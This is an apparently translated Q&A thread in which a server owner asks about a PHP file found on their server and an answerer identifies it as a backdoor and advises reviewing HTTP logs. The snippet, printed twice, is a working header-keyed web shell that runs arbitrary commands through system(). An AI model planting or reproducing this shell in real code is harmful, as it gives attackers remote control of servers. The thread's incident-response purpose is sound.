在服务器上找到文件。这个 PHP 片段有什么作用?
Found File on Server. What does this PHP Snippet do?
嘿,我在我的服务器上发现了一个 php 文件。我已经删除了它。
我很担心这个。
我在网上找不到任何关于 HTTP_X_KEY 或 HTTP_X_CW 的信息。它们在哪里使用?它们设置在哪里?
代码片段:
<?php
if (sha1($_SERVER['HTTP_X_KEY']) === '32d0703226477059ec090a0c8defc709ce7d0be0') {
system($_SERVER['HTTP_X_CW']);
} ?>
在此先感谢您的帮助。
你关心这个是对的。这基本上是一个后门。您必须进行调查以找出它是如何发生的,因为删除它并不能阻止攻击者再次做同样的事情。
这里的第一个 if 语句是为了保证只有攻击者才能使用它,这基本上是一个密码检查。 system() 函数执行系统命令。所以基本上,攻击者只需发送包含 HTTP_X_KEY 和 HTTP_X_CW headers.
的 HTTP 请求,就可以在您的计算机上远程执行任何他想要的操作。
我建议您查看您的 HTTP 日志,看看是否发出了任何奇怪的请求,例如,您可以搜索您删除的文件的名称。并尝试确定攻击者使用了哪个服务和哪个端点来为您的服务器设置后门。
嘿,我在我的服务器上发现了一个 php 文件。我已经删除了它。 我很担心这个。 我在网上找不到任何关于 HTTP_X_KEY 或 HTTP_X_CW 的信息。它们在哪里使用?它们设置在哪里? 代码片段:
<?php
if (sha1($_SERVER['HTTP_X_KEY']) === '32d0703226477059ec090a0c8defc709ce7d0be0') {
system($_SERVER['HTTP_X_CW']);
} ?>
在此先感谢您的帮助。
你关心这个是对的。这基本上是一个后门。您必须进行调查以找出它是如何发生的,因为删除它并不能阻止攻击者再次做同样的事情。
这里的第一个 if 语句是为了保证只有攻击者才能使用它,这基本上是一个密码检查。 system() 函数执行系统命令。所以基本上,攻击者只需发送包含 HTTP_X_KEY 和 HTTP_X_CW headers.
我建议您查看您的 HTTP 日志,看看是否发出了任何奇怪的请求,例如,您可以搜索您删除的文件的名称。并尝试确定攻击者使用了哪个服务和哪个端点来为您的服务器设置后门。